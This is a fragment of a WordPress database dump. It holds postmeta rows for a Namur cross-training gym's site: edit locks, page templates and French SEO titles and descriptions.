(1012, 326, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1013, 326, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1373472630:1\";}\";'),
(1014, 326, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1015, 32, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1016, 32, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1373472646:1\";}\";'),
(1017, 32, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1596, 413, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383470988:1\";}\";'),
(1593, 412, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1594, 412, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1595, 413, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1592, 412, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383470935:1\";}\";'),
(1042, 332, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1043, 332, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1374770086:1\";}\";'),
(1044, 332, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1045, 332, '_su_title', 's:89:\"a:1:{i:0;s:71:\"Cross Training Center - Une autre manière de faire du fitness à Namur\";}\";'),
(1046, 332, '_su_description', 's:166:\"a:1:{i:0;s:147:\"Unique à Namur, une nouvelle façon de faire du fitness - notre approche unique fait intervenir le coaching nutritionnel et la gestion  du stress.\";}\";'),
(1047, 332, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1048, 333, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1049, 333, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1374770152:1\";}\";'),
(1050, 333, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1051, 333, '_su_title', 's:89:\"a:1:{i:0;s:71:\"Cross Training Center - Une autre manière de faire du fitness à Namur\";}\";'),
(1052, 333, '_su_description', 's:166:\"a:1:{i:0;s:147:\"Unique à Namur, une nouvelle façon de faire du fitness - notre approche unique fait intervenir le coaching nutritionnel et la gestion  du stress.\";}\";'),
(1053, 333, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1055, 334, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1374770287:1\";}\";'),
(1056, 334, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1057, 334, '_su_title', 's:89:\"a:1:{i:0;s:71:\"Cross Training Center - Une autre manière de faire du fitness à Namur\";}\";'),
(1058, 334, '_su_description', 's:246:\"a:1:{i:0;s:227:\"Unique à Namur, une nouvelle façon de faire du fitness. Venez découvrir notre salle de cross training où vous bénéficierez d’un encadrement professionnel et d’entrainements personnalisés pour atteindre vos objectifs.\";}\";'),
(1059, 334, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1061, 335, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1374770472:1\";}\";'),
(1062, 335, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1063, 5, '_su_title', 'Cross Training Center - Notre philosophie'),
(1064, 5, '_su_description', 'Unique à Namur, une nouvelle façon de faire du fitness. Nous vous proposons une approche globale faisant intervenir l\'alimentation, l\'activité physique, et la gestion du stress'),
(1065, 5, '_su_rich_snippet_type', 'none'),
(1066, 336, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1067, 336, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1374770624:1\";}\";'),
(1068, 336, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1069, 20, '_su_title', 'Cross Training Center - L\'équipe'),
(1070, 20, '_su_description', 'Unique à Namur, une nouvelle façon de faire du fitness. Julie Pierrard, Damien Pierrard, Guélor Luabeya, Matthieu Gille, Bertrand Bauwin, Julien Meulemans.'),
(1071, 20, '_su_rich_snippet_type', 'none'),
(1072, 337, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1073, 337, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1374770677:1\";}\";'),
(1074, 337, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1075, 9, '_su_title', 'Cross Training Center - Contact'),
(1076, 9, '_su_description', 'Unique à Namur, une nouvelle façon de faire du fitness. Bowling et Squash de Namur Chaussée de Perwez 251 5002 Namur'),
(1077, 9, '_su_rich_snippet_type', 'none'),
(1078, 339, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1079, 339, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1377247543:1\";}\";'),
(1080, 339, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1081, 339, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1082, 339, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1083, 339, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1084, 35, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1085, 35, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1377247664:1\";}\";'),
(1086, 35, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1087, 35, '_su_title', 's:59:\"a:1:{i:0;s:41:\"Cross Training Center - Notre philosophie\";}\";'),
(1088, 35, '_su_description', 's:198:\"a:1:{i:0;s:179:\"Unique à Namur, une nouvelle façon de faire du fitness. Nous vous proposons une approche globale faisant intervenir l\'alimentation, l\'activité physique, et la gestion du stress\";}\";'),
(1089, 35, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1591, 412, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1590, 411, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1589, 411, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1588, 411, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1587, 411, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1586, 411, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383470923:1\";}\";'),
(1585, 411, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1584, 410, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1582, 410, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383470885:1\";}\";'),
(1583, 410, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1581, 410, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1580, 409, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1579, 409, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1578, 409, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383470281:1\";}\";'),
(1575, 408, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1576, 408, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1577, 409, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1574, 408, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383470249:1\";}\";'),
(1573, 408, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1572, 407, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1571, 407, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1570, 407, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1569, 407, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1568, 407, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383470194:1\";}\";'),
(1567, 407, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1566, 406, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1564, 406, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383469917:1\";}\";'),
(1565, 406, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1563, 406, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1562, 405, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1561, 405, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1560, 405, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383469822:1\";}\";'),
(1557, 404, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1558, 404, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1559, 405, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1556, 404, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383469597:1\";}\";'),
(1555, 404, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1554, 403, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1553, 403, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1552, 403, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1551, 403, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1550, 403, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383469561:1\";}\";'),
(1549, 403, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1548, 402, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1547, 402, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1138, 218, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1139, 218, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1379449302:2\";}\";'),
(1140, 218, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1141, 218, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1142, 218, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1379449424:2\";}\";'),
(1143, 218, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1144, 214, '_su_rich_snippet_type', 'none'),
(1145, 218, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1146, 218, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1379449424:2\";}\";'),
(1147, 218, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1148, 218, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1149, 342, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"2\";}\";'),
(1150, 342, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1379449484:2\";}\";'),
(1151, 342, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1152, 342, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1153, 218, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"2\";}\";'),
(1154, 218, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1379449498:2\";}\";'),
(1155, 218, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1156, 218, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1546, 402, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1545, 402, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1542, 401, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1543, 402, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1544, 402, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383469519:1\";}\";'),
(1541, 401, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1540, 401, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1538, 401, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383469505:1\";}\";'),
(1539, 401, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1537, 401, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1536, 400, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1535, 400, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1533, 400, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1534, 400, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1532, 400, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383469447:1\";}\";'),
(1531, 400, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1530, 399, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1529, 399, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1528, 399, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1527, 399, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1526, 399, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383469389:1\";}\";'),
(1525, 399, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1524, 398, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1522, 398, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383469369:1\";}\";'),
(1523, 398, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1521, 398, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1520, 397, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1519, 397, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1518, 397, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383469331:1\";}\";'),
(1515, 396, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1516, 396, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1517, 397, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1514, 396, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383469300:1\";}\";'),
(1513, 396, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1512, 395, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1511, 395, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1510, 395, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1509, 395, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1508, 395, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383469282:1\";}\";'),
(1507, 395, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1506, 394, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1504, 394, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383469205:1\";}\";'),
(1505, 394, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1503, 394, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1502, 393, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1501, 393, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1500, 393, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383469170:1\";}\";'),
(1497, 392, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1498, 392, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1499, 393, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1496, 392, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383469157:1\";}\";'),
(1495, 392, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1494, 391, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1493, 391, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1492, 391, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383469125:1\";}\";'),
(1803, 446, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:300;s:6:\"height\";i:236;s:4:\"file\";s:15:\"2013/11/map.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"map-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post_thumbnail\";a:4:{s:4:\"file\";s:15:\"map-300x224.png\";s:5:\"width\";i:300;s:6:\"height\";i:224;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:10:{s:8:\"aperture\";i:0;s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";i:0;s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";i:0;s:3:\"iso\";i:0;s:13:\"shutter_speed\";i:0;s:5:\"title\";s:0:\"\";}}'),
(1491, 391, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1217, 344, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1218, 344, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380962232:1\";}\";'),
(1219, 344, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1220, 344, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1221, 344, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1222, 344, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1223, 345, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1224, 345, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380962331:1\";}\";'),
(1225, 345, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1226, 345, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1227, 345, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1228, 345, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1804, 447, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1805, 447, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383475217:1\";}\";'),
(1235, 346, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1236, 346, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380962409:1\";}\";'),
(1237, 346, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1238, 346, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1239, 346, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1240, 346, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1802, 446, '_wp_attached_file', '2013/11/map.png'),
(1488, 389, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1372966329:1\";}\";'),
(1487, 389, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1479, 387, '_menu_item_xfn', ''),
(1480, 387, '_menu_item_url', ''),
(1486, 389, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1478, 387, '_menu_item_classes', 'a:1:{i:0;s:0:\"\";}'),
(1247, 347, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1248, 347, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380962872:1\";}\";'),
(1249, 347, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1250, 347, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1251, 347, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1252, 347, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1477, 387, '_menu_item_target', ''),
(1476, 387, '_menu_item_object', 'page'),
(1474, 387, '_menu_item_menu_item_parent', '0'),
(1475, 387, '_menu_item_object_id', '385'),
(1472, 385, '_su_rich_snippet_type', 'none'),
(1473, 387, '_menu_item_type', 'post_type'),
(1471, 386, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1259, 348, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1260, 348, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380962951:1\";}\";'),
(1261, 348, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1262, 348, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1263, 348, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1264, 348, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1265, 349, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1266, 349, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380963050:1\";}\";'),
(1267, 349, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1268, 349, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1269, 349, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1270, 349, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1271, 350, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1272, 350, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380963070:1\";}\";'),
(1273, 350, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1274, 350, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1275, 350, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1276, 350, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1470, 386, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383468977:1\";}\";'),
(1469, 386, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1467, 385, '_edit_lock', '1383585491:1'),
(1468, 385, '_wp_page_template', 'default'),
(1464, 384, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1465, 383, '_su_rich_snippet_type', 'none'),
(1466, 385, '_edit_last', '1'),
(1463, 384, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1383468889:1\";}\";'),
(1283, 351, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1284, 351, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380963161:1\";}\";'),
(1285, 351, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1286, 351, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1287, 351, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1288, 351, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1462, 384, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1461, 383, '_wp_page_template', 'default'),
(1460, 383, '_edit_lock', '1383585525:1'),
(1459, 383, '_edit_last', '1'),
(1458, 382, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1457, 382, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1295, 352, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1296, 352, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380963247:1\";}\";'),
(1297, 352, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1298, 352, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1299, 352, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1300, 352, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1301, 353, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1302, 353, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380963268:1\";}\";'),
(1303, 353, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1304, 353, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1305, 353, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1306, 353, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1307, 354, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
(1308, 354, '_edit_lock', 's:30:\"a:1:{i:0;s:12:\"1380963317:1\";}\";'),
(1309, 354, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1310, 354, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1311, 354, '_su_description', 's:170:\"a:1:{i:0;s:151:\"Unique à Namur, une nouvelle façon de faire du fitness - prix des séances de : Coaching nutritionnel, Personal Training, Duo Training, Team Training\";}\";'),
(1312, 354, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1456, 382, '_su_title', 's:54:\"a:1:{i:0;s:36:\"Cross Training Center - Les séances\";}\";'),
(1455, 382, '_wp_page_template', 's:24:\"a:1:{i:0;s:7:\"default\";}\";'),
(1452, 381, '_su_rich_snippet_type', 's:21:\"a:1:{i:0;s:4:\"none\";}\";'),
(1453, 382, '_edit_last', 's:18:\"a:1:{i:0;s:1:\"1\";}\";'),
